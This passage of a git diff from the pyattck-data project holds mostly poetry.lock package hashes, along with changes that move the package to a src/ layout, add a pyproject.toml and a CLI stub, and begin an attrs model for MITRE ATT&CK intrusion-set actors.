"sha256:cc0ee35043162abbf717b7df924597ade8e5395e7b66d18270116f8745ceb795"}, + {file = "tornado-6.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7250a3fa399f08ec9cb3f7b1b987955d17e044f1ade821b32e5f435130250d7f"}, + {file = "tornado-6.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:ed3ad863b1b40cd1d4bd21e7498329ccaece75db5a5bf58cd3c9f130843e7102"}, + {file = "tornado-6.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:dcef026f608f678c118779cd6591c8af6e9b4155c44e0d1bc0c87c036fb8c8c4"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:70dec29e8ac485dbf57481baee40781c63e381bebea080991893cd297742b8fd"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:d3f7594930c423fd9f5d1a76bee85a2c36fd8b4b16921cae7e965f22575e9c01"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:3447475585bae2e77ecb832fc0300c3695516a47d46cefa0528181a34c5b9d3d"}, + {file = "tornado-6.1-cp37-cp37m-win32.whl", hash = "sha256:e7229e60ac41a1202444497ddde70a48d33909e484f96eb0da9baf8dc68541df"}, + {file = "tornado-6.1-cp37-cp37m-win_amd64.whl", hash = "sha256:cb5ec8eead331e3bb4ce8066cf06d2dfef1bfb1b2a73082dfe8a161301b76e37"}, + {file = "tornado-6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:20241b3cb4f425e971cb0a8e4ffc9b0a861530ae3c52f2b0434e6c1b57e9fd95"}, + {file = "tornado-6.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c77da1263aa361938476f04c4b6c8916001b90b2c2fdd92d8d535e1af48fba5a"}, + {file = "tornado-6.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:fba85b6cd9c39be262fcd23865652920832b61583de2a2ca907dbd8e8a8c81e5"}, + {file = "tornado-6.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:1e8225a1070cd8eec59a996c43229fe8f95689cb16e552d130b9793cb570a288"}, + {file = "tornado-6.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:d14d30e7f46a0476efb0deb5b61343b1526f73ebb5ed84f23dc794bdb88f9d9f"}, + {file = "tornado-6.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:8f959b26f2634a091bb42241c3ed8d3cedb506e7c27b8dd5c7b9f745318ddbb6"}, + {file = "tornado-6.1-cp38-cp38-win32.whl", hash = "sha256:34ca2dac9e4d7afb0bed4677512e36a52f09caa6fded70b4e3e1c89dbd92c326"}, + {file = "tornado-6.1-cp38-cp38-win_amd64.whl", hash = "sha256:6196a5c39286cc37c024cd78834fb9345e464525d8991c21e908cc046d1cc02c"}, + {file = "tornado-6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:f0ba29bafd8e7e22920567ce0d232c26d4d47c8b5cf4ed7b562b5db39fa199c5"}, + {file = "tornado-6.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:33892118b165401f291070100d6d09359ca74addda679b60390b09f8ef325ffe"}, + {file = "tornado-6.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:7da13da6f985aab7f6f28debab00c67ff9cbacd588e8477034c0652ac141feea"}, + {file = "tornado-6.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:e0791ac58d91ac58f694d8d2957884df8e4e2f6687cdf367ef7eb7497f79eaa2"}, + {file = "tornado-6.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:66324e4e1beede9ac79e60f88de548da58b1f8ab4b2f1354d8375774f997e6c0"}, + {file = "tornado-6.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:a48900ecea1cbb71b8c71c620dee15b62f85f7c14189bdeee54966fbd9a0c5bd"}, + {file = "tornado-6.1-cp39-cp39-win32.whl", hash = "sha256:d3d20ea5782ba63ed13bc2b8c291a053c8d807a8fa927d941bd718468f7b950c"}, + {file = "tornado-6.1-cp39-cp39-win_amd64.whl", hash = "sha256:548430be2740e327b3fe0201abe471f314741efcb0067ec4f2d7dcfb4825f3e4"}, + {file = "tornado-6.1.tar.gz", hash = "sha256:33c6e81d7bd55b468d2e793517c909b139960b6c790a60b7991b9b6b76fb9791"}, +] +typed-ast = [ + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:2068531575a125b87a41802130fa7e29f26c09a2833fea68d9a40cf33902eba6"}, + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:c907f561b1e83e93fad565bac5ba9c22d96a54e7ea0267c708bffe863cbe4075"}, + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:1b3ead4a96c9101bef08f9f7d1217c096f31667617b58de957f690c92378b528"}, + {file = "typed_ast-1.4.3-cp35-cp35m-win32.whl", hash = "sha256:dde816ca9dac1d9c01dd504ea5967821606f02e510438120091b84e852367428"}, + {file = "typed_ast-1.4.3-cp35-cp35m-win_amd64.whl", hash = "sha256:777a26c84bea6cd934422ac2e3b78863a37017618b6e5c08f92ef69853e765d3"}, + {file = "typed_ast-1.4.3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f8afcf15cc511ada719a88e013cec87c11aff7b91f019295eb4530f96fe5ef2f"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:52b1eb8c83f178ab787f3a4283f68258525f8d70f778a2f6dd54d3b5e5fb4341"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:01ae5f73431d21eead5015997ab41afa53aa1fbe252f9da060be5dad2c730ace"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:c190f0899e9f9f8b6b7863debfb739abcb21a5c054f911ca3596d12b8a4c4c7f"}, + {file = "typed_ast-1.4.3-cp36-cp36m-win32.whl", hash = "sha256:398e44cd480f4d2b7ee8d98385ca104e35c81525dd98c519acff1b79bdaac363"}, + {file = "typed_ast-1.4.3-cp36-cp36m-win_amd64.whl", hash = "sha256:bff6ad71c81b3bba8fa35f0f1921fb24ff4476235a6e94a26ada2e54370e6da7"}, + {file = "typed_ast-1.4.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0fb71b8c643187d7492c1f8352f2c15b4c4af3f6338f21681d3681b3dc31a266"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:760ad187b1041a154f0e4d0f6aae3e40fdb51d6de16e5c99aedadd9246450e9e"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:5feca99c17af94057417d744607b82dd0a664fd5e4ca98061480fd8b14b18d04"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:95431a26309a21874005845c21118c83991c63ea800dd44843e42a916aec5899"}, + {file = "typed_ast-1.4.3-cp37-cp37m-win32.whl", hash = "sha256:aee0c1256be6c07bd3e1263ff920c325b59849dc95392a05f258bb9b259cf39c"}, + {file = "typed_ast-1.4.3-cp37-cp37m-win_amd64.whl", hash = "sha256:9ad2c92ec681e02baf81fdfa056fe0d818645efa9af1f1cd5fd6f1bd2bdfd805"}, + {file = "typed_ast-1.4.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b36b4f3920103a25e1d5d024d155c504080959582b928e91cb608a65c3a49e1a"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux1_i686.whl", hash = "sha256:067a74454df670dcaa4e59349a2e5c81e567d8d65458d480a5b3dfecec08c5ff"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7538e495704e2ccda9b234b82423a4038f324f3a10c43bc088a1636180f11a41"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:af3d4a73793725138d6b334d9d247ce7e5f084d96284ed23f22ee626a7b88e39"}, + {file = "typed_ast-1.4.3-cp38-cp38-win32.whl", hash = "sha256:f2362f3cb0f3172c42938946dbc5b7843c2a28aec307c49100c8b38764eb6927"}, + {file = "typed_ast-1.4.3-cp38-cp38-win_amd64.whl", hash = "sha256:dd4a21253f42b8d2b48410cb31fe501d32f8b9fbeb1f55063ad102fe9c425e40"}, + {file = "typed_ast-1.4.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:f328adcfebed9f11301eaedfa48e15bdece9b519fb27e6a8c01aa52a17ec31b3"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux1_i686.whl", hash = "sha256:2c726c276d09fc5c414693a2de063f521052d9ea7c240ce553316f70656c84d4"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:cae53c389825d3b46fb37538441f75d6aecc4174f615d048321b716df2757fb0"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:b9574c6f03f685070d859e75c7f9eeca02d6933273b5e69572e5ff9d5e3931c3"}, + {file = "typed_ast-1.4.3-cp39-cp39-win32.whl", hash = "sha256:209596a4ec71d990d71d5e0d312ac935d86930e6eecff6ccc7007fe54d703808"}, + {file = "typed_ast-1.4.3-cp39-cp39-win_amd64.whl", hash = "sha256:9c6d1a54552b5330bc657b7ef0eae25d00ba7ffe85d9ea8ae6540d2197a3788c"}, + {file = "typed_ast-1.4.3.tar.gz", hash = "sha256:fb1bbeac803adea29cedd70781399c99138358c26d05fcbd23c13016b7f5ec65"}, +] +typeguard = [ + {file = "typeguard-2.13.3-py3-none-any.whl", hash = "sha256:5e3e3be01e887e7eafae5af63d1f36c849aaa94e3a0112097312aabfa16284f1"}, + {file = "typeguard-2.13.3.tar.gz", hash = "sha256:00edaa8da3a133674796cf5ea87d9f4b4c367d77476e185e80251cc13dfbb8c4"}, +] +typing-extensions = [ + {file = "typing_extensions-4.2.0-py3-none-any.whl", hash = "sha256:6657594ee297170d19f67d55c05852a874e7eb634f4f753dbd667855e07c1708"}, + {file = "typing_extensions-4.2.0.tar.gz", hash = "sha256:f1c24655a0da0d1b67f07e17a5e6b2a105894e6824b92096378bb3668ef02376"}, +] +urllib3 = [ + {file = "urllib3-1.26.9-py2.py3-none-any.whl", hash = "sha256:44ece4d53fb1706f667c9bd1c648f5469a2ec925fcf3a776667042d645472c14"}, + {file = "urllib3-1.26.9.tar.gz", hash = "sha256:aabaf16477806a5e1dd19aa41f8c2b7950dd3c746362d7e3223dbe6de6ac448e"}, +] +virtualenv = [ + {file = "virtualenv-20.14.1-py2.py3-none-any.whl", hash = "sha256:e617f16e25b42eb4f6e74096b9c9e37713cf10bf30168fb4a739f3fa8f898a3a"}, + {file = "virtualenv-20.14.1.tar.gz", hash = "sha256:ef589a79795589aada0c1c5b319486797c03b67ac3984c48c669c0e4f50df3a5"}, +] +wrapt = [ + {file = "wrapt-1.14.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:1b376b3f4896e7930f1f772ac4b064ac12598d1c38d04907e696cc4d794b43d3"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:903500616422a40a98a5a3c4ff4ed9d0066f3b4c951fa286018ecdf0750194ef"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:5a9a0d155deafd9448baff28c08e150d9b24ff010e899311ddd63c45c2445e28"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:ddaea91abf8b0d13443f6dac52e89051a5063c7d014710dcb4d4abb2ff811a59"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:36f582d0c6bc99d5f39cd3ac2a9062e57f3cf606ade29a0a0d6b323462f4dd87"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:7ef58fb89674095bfc57c4069e95d7a31cfdc0939e2a579882ac7d55aadfd2a1"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:e2f83e18fe2f4c9e7db597e988f72712c0c3676d337d8b101f6758107c42425b"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:ee2b1b1769f6707a8a445162ea16dddf74285c3964f605877a20e38545c3c462"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:833b58d5d0b7e5b9832869f039203389ac7cbf01765639c7309fd50ef619e0b1"}, + {file = "wrapt-1.14.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:80bb5c256f1415f747011dc3604b59bc1f91c6e7150bd7db03b19170ee06b320"}, + {file = "wrapt-1.14.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:07f7a7d0f388028b2df1d916e94bbb40624c59b48ecc6cbc232546706fac74c2"}, + {file = "wrapt-1.14.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:02b41b633c6261feff8ddd8d11c711df6842aba629fdd3da10249a53211a72c4"}, + {file = "wrapt-1.14.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2fe803deacd09a233e4762a1adcea5db5d31e6be577a43352936179d14d90069"}, + {file = "wrapt-1.14.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:257fd78c513e0fb5cdbe058c27a0624c9884e735bbd131935fd49e9fe719d310"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4fcc4649dc762cddacd193e6b55bc02edca674067f5f98166d7713b193932b7f"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:11871514607b15cfeb87c547a49bca19fde402f32e2b1c24a632506c0a756656"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8ad85f7f4e20964db4daadcab70b47ab05c7c1cf2a7c1e51087bfaa83831854c"}, + {file = "wrapt-1.14.1-cp310-cp310-win32.whl", hash = "sha256:a9a52172be0b5aae932bef82a79ec0a0ce87288c7d132946d645eba03f0ad8a8"}, + {file = "wrapt-1.14.1-cp310-cp310-win_amd64.whl", hash = "sha256:6d323e1554b3d22cfc03cd3243b5bb815a51f5249fdcbb86fda4bf62bab9e164"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:43ca3bbbe97af00f49efb06e352eae40434ca9d915906f77def219b88e85d907"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:6b1a564e6cb69922c7fe3a678b9f9a3c54e72b469875aa8018f18b4d1dd1adf3"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:00b6d4ea20a906c0ca56d84f93065b398ab74b927a7a3dbd470f6fc503f95dc3"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:a85d2b46be66a71bedde836d9e41859879cc54a2a04fad1191eb50c2066f6e9d"}, + {file = "wrapt-1.14.1-cp35-cp35m-win32.whl", hash = "sha256:dbcda74c67263139358f4d188ae5faae95c30929281bc6866d00573783c422b7"}, + {file = "wrapt-1.14.1-cp35-cp35m-win_amd64.whl", hash = "sha256:b21bb4c09ffabfa0e85e3a6b623e19b80e7acd709b9f91452b8297ace2a8ab00"}, + {file = "wrapt-1.14.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:9e0fd32e0148dd5dea6af5fee42beb949098564cc23211a88d799e434255a1f4"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9736af4641846491aedb3c3f56b9bc5568d92b0692303b5a305301a95dfd38b1"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5b02d65b9ccf0ef6c34cba6cf5bf2aab1bb2f49c6090bafeecc9cd81ad4ea1c1"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21ac0156c4b089b330b7666db40feee30a5d52634cc4560e1905d6529a3897ff"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:9f3e6f9e05148ff90002b884fbc2a86bd303ae847e472f44ecc06c2cd2fcdb2d"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:6e743de5e9c3d1b7185870f480587b75b1cb604832e380d64f9504a0535912d1"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:d79d7d5dc8a32b7093e81e97dad755127ff77bcc899e845f41bf71747af0c569"}, + {file = "wrapt-1.14.1-cp36-cp36m-win32.whl", hash = "sha256:81b19725065dcb43df02b37e03278c011a09e49757287dca60c5aecdd5a0b8ed"}, + {file = "wrapt-1.14.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b014c23646a467558be7da3d6b9fa409b2c567d2110599b7cf9a0c5992b3b471"}, + {file = "wrapt-1.14.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:88bd7b6bd70a5b6803c1abf6bca012f7ed963e58c68d76ee20b9d751c74a3248"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5901a312f4d14c59918c221323068fad0540e34324925c8475263841dbdfe68"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d77c85fedff92cf788face9bfa3ebaa364448ebb1d765302e9af11bf449ca36d"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d649d616e5c6a678b26d15ece345354f7c2286acd6db868e65fcc5ff7c24a77"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:7d2872609603cb35ca513d7404a94d6d608fc13211563571117046c9d2bcc3d7"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:ee6acae74a2b91865910eef5e7de37dc6895ad96fa23603d1d27ea69df545015"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:2b39d38039a1fdad98c87279b48bc5dce2c0ca0d73483b12cb72aa9609278e8a"}, + {file = "wrapt-1.14.1-cp37-cp37m-win32.whl", hash = "sha256:60db23fa423575eeb65ea430cee741acb7c26a1365d103f7b0f6ec412b893853"}, + {file = "wrapt-1.14.1-cp37-cp37m-win_amd64.whl", hash = "sha256:709fe01086a55cf79d20f741f39325018f4df051ef39fe921b1ebe780a66184c"}, + {file = "wrapt-1.14.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8c0ce1e99116d5ab21355d8ebe53d9460366704ea38ae4d9f6933188f327b456"}, + {file = "wrapt-1.14.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e3fb1677c720409d5f671e39bac6c9e0e422584e5f518bfd50aa4cbbea02433f"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:642c2e7a804fcf18c222e1060df25fc210b9c58db7c91416fb055897fc27e8cc"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b7c050ae976e286906dd3f26009e117eb000fb2cf3533398c5ad9ccc86867b1"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef3f72c9666bba2bab70d2a8b79f2c6d2c1a42a7f7e2b0ec83bb2f9e383950af"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:01c205616a89d09827986bc4e859bcabd64f5a0662a7fe95e0d359424e0e071b"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:5a0f54ce2c092aaf439813735584b9537cad479575a09892b8352fea5e988dc0"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2cf71233a0ed05ccdabe209c606fe0bac7379fdcf687f39b944420d2a09fdb57"}, + {file = "wrapt-1.14.1-cp38-cp38-win32.whl", hash = "sha256:aa31fdcc33fef9eb2552cbcbfee7773d5a6792c137b359e82879c101e98584c5"}, + {file = "wrapt-1.14.1-cp38-cp38-win_amd64.whl", hash = "sha256:d1967f46ea8f2db647c786e78d8cc7e4313dbd1b0aca360592d8027b8508e24d"}, + {file = "wrapt-1.14.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3232822c7d98d23895ccc443bbdf57c7412c5a65996c30442ebe6ed3df335383"}, + {file = "wrapt-1.14.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:988635d122aaf2bdcef9e795435662bcd65b02f4f4c1ae37fbee7401c440b3a7"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cca3c2cdadb362116235fdbd411735de4328c61425b0aa9f872fd76d02c4e86"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d52a25136894c63de15a35bc0bdc5adb4b0e173b9c0d07a2be9d3ca64a332735"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:40e7bc81c9e2b2734ea4bc1aceb8a8f0ceaac7c5299bc5d69e37c44d9081d43b"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:b9b7a708dd92306328117d8c4b62e2194d00c365f18eff11a9b53c6f923b01e3"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:6a9a25751acb379b466ff6be78a315e2b439d4c94c1e99cb7266d40a537995d3"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:34aa51c45f28ba7f12accd624225e2b1e5a3a45206aa191f6f9aac931d9d56fe"}, + {file = "wrapt-1.14.1-cp39-cp39-win32.whl", hash = "sha256:dee0ce50c6a2dd9056c20db781e9c1cfd33e77d2d569f5d1d9321c641bb903d5"}, + {file = "wrapt-1.14.1-cp39-cp39-win_amd64.whl", hash = "sha256:dee60e1de1898bde3b238f18340eec6148986da0455d8ba7848d50470a7a32fb"}, + {file = "wrapt-1.14.1.tar.gz", hash = "sha256:380a85cf89e0e69b7cfbe2ea9f765f004ff419f34194018a6827ac0e3edfed4d"}, +] +xdoctest = [ + {file = "xdoctest-1.0.0-py2-none-any.whl", hash = "sha256:0b0b5958e0ac0a28c5496f96b7f0adbeb0ea7e0c0a227de1ce3bc79ddb1a4f00"}, + {file = "xdoctest-1.0.0-py3-none-any.whl", hash = "sha256:76f44dc74515ff4bdf3cc3e91a2e408cf5699cfa03367634efaadf138c7b132d"}, + {file = "xdoctest-1.0.0.tar.gz", hash = "sha256:7ebba7e71457e6e7cf86c463699575e52b1c9cc32ee2ee5e72256d6cd3aaeb2d"}, +] +xlrd = [ + {file = "xlrd-2.0.1-py2.py3-none-any.whl", hash = "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd"}, + {file = "xlrd-2.0.1.tar.gz", hash = "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88"}, +] +zipp = [ + {file = "zipp-3.8.0-py3-none-any.whl", hash = "sha256:c4f6e5bbf48e74f7a38e7cc5b0480ff42b0ae5178957d564d18932525d5cf099"}, + {file = "zipp-3.8.0.tar.gz", hash = "sha256:56bf8aadb83c24db6c4b577e13de374ccfb67da2078beba1d037c17980bf43ad"}, +] diff --git a/pyattck_data/__init__.py b/pyattck_data/__init__.py deleted file mode 100644 index c55db4f..0000000 --- a/pyattck_data/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .pyattckdata import PyattckData -from .generatenistdata import GenerateNISTData \ No newline at end of file diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 0000000..a1eae06 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,83 @@ +[tool.poetry] +name = "pyattck-data" +version = "2.0.1" +description = "Pyattck Data" +authors = ["Swimlane "] +license = "MIT" +readme = "README.md" +homepage = "https://github.com/swimlane/pyattck-data" +repository = "https://github.com/swimlane/pyattck-data" +classifiers = [ + "Development Status :: 3 - Alpha", +] + +[tool.poetry.urls] +Changelog = "https://github.com/swimlane/pyattck-data/releases" + +[tool.poetry.dependencies] +python = "^3.7" +click = "^8.0.1" +attrs = "^21.4.0" +pydantic = "^1.9.1" +requests = "^2.28.0" +PyYAML = "^6.0" +PyGithub = "^1.55" +xlrd = "^2.0.1" +Markdown = "<=3.3.6" +googletrans = "^3.0.0" +bs4 = "^0.0.1" +PyNaCl = "^1.5.0" +importlib-metadata = "<3.8" + +[tool.poetry.dev-dependencies] +pytest = "^7.1.2" +coverage = {extras = ["toml"], version = "^6.1"} +safety = "^1.10.3" +mypy = "^0.910" +typeguard = "^2.13.2" +xdoctest = {extras = ["colors"], version = "^1.0.0"} +sphinx = "^4.3.0" +sphinx-autobuild = ">=2021.3.14" +pre-commit = "^2.15.0" +flake8 = "^4.0.1" +black = ">=21.10b0" +flake8-bandit = "^2.1.2" +flake8-bugbear = "^21.9.2" +flake8-docstrings = "^1.6.0" +flake8-rst-docstrings = "^0.2.3" +pep8-naming = "^0.12.1" +darglint = "^1.8.1" +reorder-python-imports = "^2.6.0" +pre-commit-hooks = "^4.0.1" +sphinx-click = "^3.0.2" +Pygments = "^2.10.0" +pyupgrade = "^2.29.1" +furo = ">=2021.11.12" +requests = "^2.27.1" + +[tool.poetry.scripts] +pyattck-data-models = "pyattck_data.__main__:main" + +[tool.coverage.paths] +source = ["src", "*/site-packages"] +tests = ["tests", "*/tests"] + +[tool.coverage.run] +branch = true +source = ["pyattck_data", "tests"] + +[tool.coverage.report] +show_missing = true +fail_under = 100 + +[tool.mypy] +strict = true +warn_unreachable = true +pretty = true +show_column_numbers = true +show_error_codes = true +show_error_context = true + +[build-system] +requires = ["poetry-core>=1.0.0"] +build-backend = "poetry.core.masonry.api" diff --git a/src/pyattck_data/__init__.py b/src/pyattck_data/__init__.py new file mode 100644 index 0000000..aafb579 --- /dev/null +++ b/src/pyattck_data/__init__.py @@ -0,0 +1,2 @@ +from .pyattckdata import PyattckData +from .generatenistdata import GenerateNISTData diff --git a/src/pyattck_data/__main__.py b/src/pyattck_data/__main__.py new file mode 100644 index 0000000..44b893e --- /dev/null +++ b/src/pyattck_data/__main__.py @@ -0,0 +1,12 @@ +"""Command-line interface.""" +import click + + +@click.command() +@click.version_option() +def main() -> None: + """Pyattck Data.""" + + +if __name__ == "__main__": + main(prog_name="pyattck-data") # pragma: no cover diff --git a/pyattck_data/base.py b/src/pyattck_data/base.py similarity index 83% rename from pyattck_data/base.py rename to src/pyattck_data/base.py index 8be6fb0..2415b6b 100644 --- a/pyattck_data/base.py +++ b/src/pyattck_data/base.py @@ -1,6 +1,6 @@ import abc -from pyattck_data_models import GeneratedData +from .models.generated import GeneratedData class Base: diff --git a/pyattck_data/data/conversion.json b/src/pyattck_data/data/conversion.json similarity index 100% rename from pyattck_data/data/conversion.json rename to src/pyattck_data/data/conversion.json diff --git a/pyattck_data/generatenistdata.py b/src/pyattck_data/generatenistdata.py similarity index 100% rename from pyattck_data/generatenistdata.py rename to src/pyattck_data/generatenistdata.py diff --git a/pyattck_data/githubcontroller.py b/src/pyattck_data/githubcontroller.py similarity index 100% rename from pyattck_data/githubcontroller.py rename to src/pyattck_data/githubcontroller.py diff --git a/pyattck_data/markdowntable.py b/src/pyattck_data/markdowntable.py similarity index 100% rename from pyattck_data/markdowntable.py rename to src/pyattck_data/markdowntable.py diff --git a/src/pyattck_data/models/__init__.py b/src/pyattck_data/models/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/pyattck_data/models/actor.py b/src/pyattck_data/models/actor.py new file mode 100644 index 0000000..c1594d9 --- /dev/null +++ b/src/pyattck_data/models/actor.py @@ -0,0 +1,91 @@ +from .types import ( + Id, + SemVersion, + MitreDomain +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Actor(BaseModel): + type: AnyStr = field(validator=validators.in_(['intrusion-set'])) + aliases: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + revoked: bool = field(factory=bool) + description: AnyStr = field(factory=str) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + created_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # These additional properties are 